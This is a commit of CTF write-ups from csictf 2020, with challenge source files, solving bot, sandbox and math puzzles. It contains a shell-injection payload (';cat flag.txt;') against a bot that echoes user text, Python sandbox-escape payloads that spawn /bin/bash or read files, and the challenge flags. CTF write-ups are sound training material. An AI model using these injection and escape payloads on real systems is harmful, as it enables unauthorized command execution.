rishitsaiya
4 years ago
11 changed files with 556 additions and 0 deletions
@ -0,0 +1,34 @@ |
|||
## BroBot |
|||
The main idea finding the flag is just using Bot to get the flag. |
|||
|
|||
#### Step-1: |
|||
I tried `/about` to get information about the bot and got this: |
|||
|
|||
```python |
|||
CTF - https://ctf.csivit.com/ |
|||
Our Team - https://ctftime.org/team/77170/ |
|||
Homepage - https://csivit.com/ |
|||
Contribute - https://github.com/alias-rahil/speakingbot.git/ |
|||
CTF Support - https://discord.com/invite/9wHPB2B/ |
|||
BoT Support - @alias_rahil |
|||
``` |
|||
#### Step-2: |
|||
I used `/text2voice`. I linked to the source of the bot. It writes our text as `arg` for `echo` in a bash script. Then pipes the script's output to `espeak` to get the sound. |
|||
|
|||
#### Step-3: |
|||
I got this from [writeup](https://github.com/goswami-rahul/ctf/tree/master/csictf2020/brobot) to execute. |
|||
|
|||
```bash |
|||
fs = open(f"/home/ctf/{update.message.from_user.id}", "w") |
|||
fs.write(f"echo '{text}'") |
|||
fs.close() |
|||
os.system( |
|||
f"su ctf -c 'sh /home/ctf/{update.message.from_user.id} | espeak -w /home/ctf/{update.message.from_user.id}.wav --stdin'" |
|||
) |
|||
``` |
|||
|
|||
Then a simple `';cat flag.txt;'` gives us the answer. |
|||
|
|||
#### Step-4: |
|||
Finally the flag becomes: |
|||
`csictf{ai_will_take_over_the_world}` |
After Width: | Height: | Size: 18 KiB |
@ -0,0 +1,84 @@ |
|||
## Escape Plan |
|||
The main idea finding the flag is just spawning into a sandbox. |
|||
|
|||
#### Step-1: |
|||
When we run `nc chall.csivit.com 30419`, we are greeted with, |
|||
|
|||
```bash |
|||
Welcome to cipher decoder, an open-source script in python! |
|||
|
|||
EXAMPLES: |
|||
shift_cipher_key('hello', 25) |
|||
shift_cipher_bruteforce('hello') |
|||
encrypt_vigenere('TEXT', 'KEY') |
|||
decrypt_vigenere('DIVD', 'KEY') |
|||
|
|||
Currently supported ciphers: |
|||
shift_cipher_key(text, shift) |
|||
shift_cipher_bruteforce(text) |
|||
encrypt_vigenere(plaintext, key) |
|||
decrypt_vigenere(ciphertext, key) |
|||
|
|||
To exit: |
|||
exit() |
|||
|
|||
I am constantly trying to make this cipher decoder better and more secure! Help me add support to more ciphers by submitting a PR! |
|||
Hope it helps you! |
|||
``` |
|||
|
|||
#### Step-2: |
|||
So to escape, I tried `eval('__import__("os").system("/bin/bash")')` and I was in. |
|||
|
|||
Once in I directly checked, `ls -al`, and I got this: |
|||
|
|||
```bash |
|||
total 20 |
|||
drwxr-x--- 1 root ctf 4096 Jul 22 06:35 . |
|||
drwxr-xr-x 1 root root 4096 Jul 26 16:58 .. |
|||
drwxr-x--- 1 root ctf 4096 Jul 22 06:27 .git |
|||
-rwxr-x--- 1 root ctf 2654 Jul 22 06:27 crypto.py |
|||
-rwxr-x--- 1 root ctf 52 Jul 22 06:27 start.sh |
|||
``` |
|||
|
|||
#### Step-3: |
|||
I checked other files, but I will stick to procedure here. Since the description involved a PR, I checked `.git` first by `cd .git`. I got usual files: |
|||
|
|||
```bash |
|||
COMMIT_EDITMSG |
|||
HEAD |
|||
config |
|||
description |
|||
hooks |
|||
index |
|||
info |
|||
logs |
|||
objects |
|||
packed-refs |
|||
refs |
|||
``` |
|||
At this point, I generally check `logs` to get an overview over the changes in the repo, but here the permission was denied. |
|||
|
|||
#### Step-4: |
|||
So, I checked config files by `cat config` and I got this: |
|||
|
|||
```bash |
|||
[core] |
|||
repositoryformatversion = 0 |
|||
filemode = true |
|||
bare = false |
|||
logallrefupdates = true |
|||
[remote "origin"] |
|||
url = https://github.com/alias-rahil/crypto-cli |
|||
fetch = +refs/heads/*:refs/remotes/origin/* |
|||
[branch "master"] |
|||
remote = origin |
|||
merge = refs/heads/master |
|||
``` |
|||
#### Step-4: |
|||
Now, I got a URL and checked at the given head and got the flag. |
|||
|
|||
<img src="Flag.png"> |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{2077m4y32_h45_35c4p3d}` |
@ -0,0 +1,226 @@ |
|||
## Friends |
|||
The main idea finding the flag is just parsing the input smartly. |
|||
|
|||
#### Step-1: |
|||
When we download `namo.py`, we are greeted with: |
|||
|
|||
```python |
|||
import math |
|||
import sys |
|||
|
|||
def fancy(x): |
|||
a = (1/2) * x |
|||
b = (1/2916) * ((27 * x - 155) ** 2) |
|||
c = 4096 / 729 |
|||
d = (b - c) ** (1/2) |
|||
e = (a - d - 155/54) ** (1/3) |
|||
f = (a + d - 155/54) ** (1/3) |
|||
g = e + f + 5/3 |
|||
return g |
|||
|
|||
def notfancy(x): |
|||
return x**3 - 5*x**2 + 3*x + 10 |
|||
|
|||
def mathStuff(x): |
|||
if (x < 3 or x > 100): |
|||
exit() |
|||
|
|||
y = fancy(notfancy(x)) |
|||
|
|||
if isinstance(y, complex): |
|||
y = float(y.real) |
|||
|
|||
y = round(y, 0) |
|||
return y |
|||
|
|||
print("Enter a number: ") |
|||
sys.stdout.flush() |
|||
x = round(float(input()), 0) |
|||
if x == mathStuff(x): |
|||
print('Fail') |
|||
sys.stdout.flush() |
|||
else: |
|||
print(open('namo.txt').read()) |
|||
sys.stdout.flush() |
|||
``` |
|||
|
|||
#### Step-2: |
|||
So I tried basic numbers and it worked according to the given algorithm but however, we could try a float `nan` and then I ran it along with the remote server to enter the `else` condition at the end. |
|||
|
|||
```bash |
|||
echo nan | nc chall.csivit.com 30425 |
|||
``` |
|||
Output: |
|||
|
|||
```bash |
|||
Enter a number: |
|||
Mitrooon |
|||
bhaiyo aur behno "Enter a number" |
|||
mann ki baat nambar |
|||
|
|||
agar nambar barabar 1 hai { |
|||
bhaiyo aur behno "s" |
|||
} |
|||
|
|||
nahi toh agar nambar barabar 13 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 15 hai { |
|||
bhaiyo aur behno "5" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 22 hai { |
|||
bhaiyo aur behno "4" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 28 hai { |
|||
bhaiyo aur behno "k" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 8 hai { |
|||
bhaiyo aur behno "y" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 17 hai { |
|||
bhaiyo aur behno "4" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 9 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 4 hai { |
|||
bhaiyo aur behno "t" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 3 hai { |
|||
bhaiyo aur behno "c" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 20 hai { |
|||
bhaiyo aur behno "r" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 12 hai { |
|||
bhaiyo aur behno "n" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 0 hai { |
|||
bhaiyo aur behno "c" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 23 hai { |
|||
bhaiyo aur behno "t" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 27 hai { |
|||
bhaiyo aur behno "0" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 10 hai { |
|||
bhaiyo aur behno "n" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 11 hai { |
|||
bhaiyo aur behno "4" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 7 hai { |
|||
bhaiyo aur behno "m" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 25 hai { |
|||
bhaiyo aur behno "c" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 24 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 6 hai { |
|||
bhaiyo aur behno "{" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 16 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 18 hai { |
|||
bhaiyo aur behno "_" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 2 hai { |
|||
bhaiyo aur behno "i" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 5 hai { |
|||
bhaiyo aur behno "f" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 19 hai { |
|||
bhaiyo aur behno "g" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 14 hai { |
|||
bhaiyo aur behno "1" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 21 hai { |
|||
bhaiyo aur behno "3" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 26 hai { |
|||
bhaiyo aur behno "0" |
|||
} |
|||
|
|||
|
|||
nahi toh agar nambar barabar 29 hai { |
|||
bhaiyo aur behno "}" |
|||
} |
|||
|
|||
nahi toh { |
|||
bhaiyo aur behno "" |
|||
} |
|||
|
|||
achhe din aa gaye |
|||
``` |
|||
|
|||
#### Step-3: |
|||
Simple substitution like 0=c, 1=s, 2=i in the context of flag like `csictf{`, would also work. Instead I got this script to get the flag. |
|||
|
|||
```bash |
|||
echo nan | nc chall.csivit.com 30425 | grep -A1 'hai {' | sed 's/agar nambar barabar //' | sed 's/nahi toh //' | sed 's/ hai {$/ =/' | sed 's/^\tbhaiyo aur behno \"//' | sed 's/\"$//' | sed 's/--//' | sed ':a;N;$!ba;s/=\n/ /g' | sort -n | uniq | awk '{print $2}' | tr -d '\n'; echo '' |
|||
``` |
|||
This is a 1 liner and we get the flag after this. |
|||
|
|||
#### Step-5: |
|||
Finally the flag becomes: |
|||
`csictf{my_n4n_15_4_gr34t_c00k}` |
@ -0,0 +1,38 @@ |
|||
import math |
|||
import sys |
|||
|
|||
def fancy(x): |
|||
a = (1/2) * x |
|||
b = (1/2916) * ((27 * x - 155) ** 2) |
|||
c = 4096 / 729 |
|||
d = (b - c) ** (1/2) |
|||
e = (a - d - 155/54) ** (1/3) |
|||
f = (a + d - 155/54) ** (1/3) |
|||
g = e + f + 5/3 |
|||
return g |
|||
|
|||
def notfancy(x): |
|||
return x**3 - 5*x**2 + 3*x + 10 |
|||
|
|||
def mathStuff(x): |
|||
if (x < 3 or x > 100): |
|||
exit() |
|||
|
|||
y = fancy(notfancy(x)) |
|||
|
|||
if isinstance(y, complex): |
|||
y = float(y.real) |
|||
|
|||
y = round(y, 0) |
|||
return y |
|||
|
|||
print("Enter a number: ") |
|||
sys.stdout.flush() |
|||
x = round(float(input()), 0) |
|||
if x == mathStuff(x): |
|||
print('Fail') |
|||
sys.stdout.flush() |
|||
else: |
|||
print(open('namo.txt').read()) |
|||
sys.stdout.flush() |
|||
|
@ -0,0 +1,51 @@ |
|||
## Machine Fix |
|||
The main idea finding the flag is just understanding the algorithm. |
|||
|
|||
#### Step-1: |
|||
|
|||
After I downloaded `code.py`, I tried to understand the workflow here: |
|||
|
|||
```python |
|||
def convert (n): |
|||
if n == 0: |
|||
return '0' |
|||
nums = [] |
|||
while n: |
|||
n, r = divmod(n, 3) |
|||
nums.append(str(r)) |
|||
return ''.join(reversed(nums)) |
|||
|
|||
count=0 |
|||
n=1 |
|||
while(n<=523693181734689806809285195318): |
|||
str1=convert(n) |
|||
str2=convert(n-1) |
|||
str2='0'*(len(str1)-len(str2))+str2 |
|||
for i in range(len(str1)): |
|||
if(str1[i]!=str2[i]): |
|||
count+=1 |
|||
n+=1 |
|||
|
|||
print(count) |
|||
``` |
|||
|
|||
#### Step-2: |
|||
For every number n, n and n - 1 are converted to base 3 & then, the program compare the digits, the number of differences is added to total. |
|||
|
|||
So I wrote a simple `flag.py` script to get flag: |
|||
|
|||
```python |
|||
def flag(n): |
|||
sum = 0 |
|||
while (n > 0): |
|||
sum += n |
|||
n //= 3 |
|||
return sum |
|||
|
|||
print(flag(523693181734689806809285195318)) |
|||
``` |
|||
On running it by `python3 flag.py` |
|||
|
|||
#### Step-3: |
|||
Finally the flag becomes: |
|||
`csictf{785539772602034710213927792950}` |
@ -0,0 +1,21 @@ |
|||
def convert (n): |
|||
if n == 0: |
|||
return '0' |
|||
nums = [] |
|||
while n: |
|||
n, r = divmod(n, 3) |
|||
nums.append(str(r)) |
|||
return ''.join(reversed(nums)) |
|||
|
|||
count=0 |
|||
n=1 |
|||
while(n<=523693181734689806809285195318): |
|||
str1=convert(n) |
|||
str2=convert(n-1) |
|||
str2='0'*(len(str1)-len(str2))+str2 |
|||
for i in range(len(str1)): |
|||
if(str1[i]!=str2[i]): |
|||
count+=1 |
|||
n+=1 |
|||
|
|||
print(count) |
@ -0,0 +1,8 @@ |
|||
def flag(n): |
|||
sum = 0 |
|||
while (n > 0): |
|||
sum += n |
|||
n //= 3 |
|||
return sum |
|||
|
|||
print(flag(523693181734689806809285195318)) |
After Width: | Height: | Size: 156 KiB |
@ -0,0 +1,15 @@ |
|||
## No DIStractions |
|||
The main idea finding the flag is getting the flag from Discord Bot. |
|||
|
|||
#### Step-1: |
|||
|
|||
The tag `Discord` clearly implies that you have to check something out there. So, I went to misc channel and checked out this bot called `Kuwu`. |
|||
|
|||
#### Step-2: |
|||
After trying `flag`, `./flag`, etc., it worked on `.flag`. |
|||
|
|||
<img src ="Flag.png"> |
|||
|
|||
#### Step-3: |
|||
Finally the flag becomes: |
|||
`csictf{m0r3_huMaN_than_Y0u}` |
@ -0,0 +1,79 @@ |
|||
## Prison Break |
|||
The main idea finding the flag is just escaping Python Sandbox. |
|||
|
|||
#### Step-1: |
|||
After I ran `nc chall.csivit.com 30407`, we get this a python sandbox. |
|||
|
|||
I tried various commands like flag and ctf and all, but nothing worked. |
|||
|
|||
#### Step-2: |
|||
Thanks to organiser, they gave some hint: https://ctf-wiki.github.io/ctf-wiki/pwn//linux/sandbox/python-sandbox-escape/ |
|||
|
|||
#### Step-3: |
|||
There I got this 1 liner to escape the sandbox. |
|||
|
|||
**Payload:** |
|||
```python |
|||
print(().__class__.__bases__[0].__subclasses__()[40](__file__).read()) |
|||
``` |
|||
|
|||
I got the source code, which had the flag. |
|||
|
|||
```python |
|||
#!/usr/bin/python |
|||
|
|||
import sys |
|||
|
|||
class Sandbox(object): |
|||
def execute(self, code_string): |
|||
exec(code_string) |
|||
sys.stdout.flush() |
|||
|
|||
sandbox = Sandbox() |
|||
|
|||
_raw_input = raw_input |
|||
|
|||
main = sys.modules["__main__"].__dict__ |
|||
orig_builtins = main["__builtins__"].__dict__ |
|||
|
|||
builtins_whitelist = set(( |
|||
#exceptions |
|||
'ArithmeticError', 'AssertionError', 'AttributeError', 'Exception', |
|||
|
|||
#constants |
|||
'False', 'None', 'True', |
|||
|
|||
#types |
|||
'basestring', 'bytearray', 'bytes', 'complex', 'dict', |
|||
|
|||
#functions |
|||
'abs', 'bin', 'dir', 'help' |
|||
|
|||
# blocked: eval, execfile, exit, file, quit, reload, import, etc. |
|||
)) |
|||
|
|||
for builtin in orig_builtins.keys(): |
|||
if builtin not in builtins_whitelist: |
|||
del orig_builtins[builtin] |
|||
|
|||
print("Find the flag.") |
|||
sys.stdout.flush() |
|||
|
|||
def flag_function(): |
|||
flag = "csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}" |
|||
|
|||
while 1: |
|||
try: |
|||
sys.stdout.write(">>> ") |
|||
sys.stdout.flush() |
|||
code = _raw_input() |
|||
sandbox.execute(code) |
|||
|
|||
except Exception: |
|||
print("You have encountered an error.") |
|||
sys.stdout.flush() |
|||
``` |
|||
|
|||
#### Step-4: |
|||
Finally the flag becomes: |
|||
`csictf{m1ch34l_sc0fi3ld_fr0m_pr1s0n_br34k}` |
Loading…
Reference in new issue